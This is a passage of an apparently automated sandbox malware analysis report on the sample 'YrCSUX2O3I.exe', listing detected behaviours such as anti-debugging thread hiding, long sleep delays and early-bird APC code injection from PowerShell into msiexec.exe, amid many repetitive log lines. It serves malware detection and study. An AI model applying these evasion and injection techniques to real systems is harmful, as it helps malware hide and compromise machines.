    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7407Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2203Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6068Thread sleep time: -5534023222112862s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exe TID: 3916Thread sleep time: -220000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055D5
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_00406089 FindFirstFileW,FindClose,0_2_00406089
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: msiexec.exe, 00000008.00000003.2397727614.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2466820778.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2161988964.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2408835178.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2249580479.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2209315293.0000000007F99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2538548894.0000000007F99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: msiexec.exe, 00000008.00000003.2562006346.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2397727614.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2295597744.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2352334753.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2262078863.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2340671273.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2374936208.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2307435185.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2363131954.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2220377097.0000000007FD8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2479027485.0000000007FD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWswsock.dll.mui6
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeAPI call chain: ExitProcess graph end nodegraph_0-3121
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeAPI call chain: ExitProcess graph end nodegraph_0-3127
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060B0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Early bird code injection technique detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
    Queues an APC in another process (thread injection)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
    Writes to foreign memory regions
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
